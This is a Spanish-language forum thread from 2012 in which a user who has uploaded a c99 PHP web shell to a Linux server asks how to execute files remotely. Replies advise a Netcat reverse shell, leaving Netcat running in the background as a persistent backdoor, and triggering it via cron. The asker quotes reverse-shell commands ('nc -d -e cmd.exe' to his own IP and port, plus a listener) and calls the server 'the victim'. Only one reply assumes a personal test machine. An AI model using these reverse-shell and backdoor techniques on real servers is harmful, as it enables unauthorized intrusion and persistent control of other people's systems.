ejecutar un archivo remotamente

varc · 12 Agosto 2012, 21:08 PM

alguien sabe cuales son las formas de ejecutar un archivo remotamente?
porque la idea es subir una shell al server y despues ejecutar algunos archivos pero no se como podria ejecutarlos $:-\$

pepeluxx · 15 Agosto 2012, 21:51 PM

Si tienes acceso para subir algo, puedes crearte una aplicación cliente-servidor, o directamente creas una reverse shell que tras ejecutarla te abra una conexión remota

varc · 16 Agosto 2012, 17:51 PM

muchas gracias lo probare

tremolero · 17 Agosto 2012, 20:27 PM

Pero pepeluxx, una duda...
Aunque pueda subir una reverse shell, como ejecutas la reverse shell?
Porque creo que esa es la duda principal o tal vez me estoy equivocando?

Saludos...

pepeluxx · 18 Agosto 2012, 10:12 AM

Cita de: tremolero en 17 Agosto 2012, 20:27 PM
Pero pepeluxx, una duda...
Aunque pueda subir una reverse shell, como ejecutas la reverse shell?
Porque creo que esa es la duda principal o tal vez me estoy equivocando?

Saludos...

Pues dependiendo del sistema y de muchos factores. La verdad es que ha aportado poca información. Pero es cosa de echarle imaginación ... un cron, una app que intente conectar cada x tiempo, etc

SokarTefnut · 5 Septiembre 2012, 19:15 PM

Si tienes posibilidad de subir algo al server puedes dejarle instalado Netcat ó Ncat, configurarlo para que arranque en segundo plano y tener un puerta de acceso cuando quieras.

Con cualquiera de estos dos programas podras luego subir o arrancar lo que quieras desde tu equipo.

varc · 6 Septiembre 2012, 15:34 PM

muy bien paso a explicar los detalles: estoy usando la shell c99,el server usa linux y puedo subir archivos

estuve leyendo en los foros acerca de netcat.....y segun parece, tengo que subir el netcat al server con un .bat con un codigo parecido a este:

nc -d -e cmd.exe MIIP PUERTO

en MIIP pongo mi IP, y en PUERTO pongo un puerto para conectarme

como el server es linux dudo que funcione lo de cmd.exe (aunque realmente deconosco el tema)

y luego en MS-Dos pongo esto:

nc -vv -l -p PUERTO

de esta manera el netcat estaria a la escucha pero el problema seria ejecutar el .bat en la victima...

PD:esta informacion la saque de otros foros corrijanme si me equivoco

pepeluxx · 6 Septiembre 2012, 15:42 PM

No se en qué tipo de máquina estás pero si esa máquina está detrás de un firewall, no podrás conectar.

Lo mejor es una reverse shell, es decir, pones eso en tu máquina (nc -l -p PUERTO) para dejarla a la escucha y, desde la víctima (que supongo que será otra máquina tuya de pruebas y no estás haciendo nada ilegal), conectas con otro netcat, que puedes ejecutar desde la PHP shell.

tremolero · 6 Septiembre 2012, 16:11 PM

pepeluxx, creo que varc esta haciendo lo que tu indicas, el problema pueden ser varios:
1) quizas si ejecuta primero el bat y luego el netcat de su pc(el que esta a la escuxa) no conectara.
2) si el pc es un linux, no se si podra ejecutar el .bat
3) al ser linux, no creo que funcione el cmd.exe

Entonces por hacer un resumen de alguna manera, en su pc pone el nc a la escucha, luego en el pc maquina ejecuta el nc para que se conecte a su pc (ya sea mediante un click, una shell, cron, etc...)
y listo...

El problema que se encuentra es que al intentar hacerlo desde windows a un linux, se encuentra con que .bat no creo que funcione, cmd no creo que exista en linux, si intenta llamar a la consola en linux teniendo windows pienso que le dara error.

Saludos....

pepeluxx · 6 Septiembre 2012, 16:36 PM

Pues si es linux, evidentemente, cmd.exe no irá .. debe ser /bin/sh

Lo que no entiendo es para qué el bat? si puede meter a mano la línea. De todas formas, en linux no es un bat sino un sh

Creo que hay que aprender un poquito de sistemas antes de seguir un manual que no se entiende, no?